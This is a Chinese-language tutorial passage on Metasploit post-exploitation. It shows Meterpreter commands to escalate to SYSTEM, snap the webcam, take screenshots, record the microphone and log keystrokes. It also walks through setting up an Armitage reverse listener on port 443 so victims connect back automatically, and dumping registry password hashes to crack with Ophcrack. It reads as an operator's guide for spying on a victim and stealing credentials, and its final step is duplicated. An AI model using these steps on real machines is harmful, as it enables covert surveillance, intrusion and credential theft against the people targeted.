想辦法讓目標運行payload
- 回車開始監控。
- meterpreter得到,可以使用以下命令,對目標機攻擊,如果會話被關閉可以使用sessions命令查看當前可連接的會話,並用sessions -i 會話ID進行連接,使用quit命令可退出Meterpreter。
getsystem 獲取系統權限
webcam_snap 嘗試開啟攝像頭,下圖提示目標沒有攝像頭設備。
screenshot 獲取目標屏幕截屏,如下圖已經保存在了/usr/share/set下。
record_mic -d 10 錄制10秒鍾聲音
keyscan_start 開啟鍵盤記錄
keyscan_dump 查看鍵盤記錄到的內容
armitage可以設置自動上線監控
- 打開Armitage依次點擊菜單中的Armitage--Listeners--Set LHOST,填寫本機IP地址。
- 然后選擇Reverse(wait for)設置端口和類型。這里我們填寫443端口和Meterpreter類型。
- 配置好后點擊Start Listener開始監聽,此時msf會自動配置exploit模塊。
- 此時目標主機開機並運行我們的Payload文件時,目標會自動出現在Armitage控制台界面內並被開啟Meterpreter會話。
- 獲取目標主機開機密碼
如果想獲得目標主機開機密碼,我們可以通過抓取Hash值的方法進行破解,步驟如下:
在目標上右鍵依次點擊Meterpreter--Access--Dump Hashes--registry method
可以使用Ophcrack這類軟件導入Hash值進行破解。
在目標上右鍵依次點擊Meterpreter--Access--Dump Hashes--registry method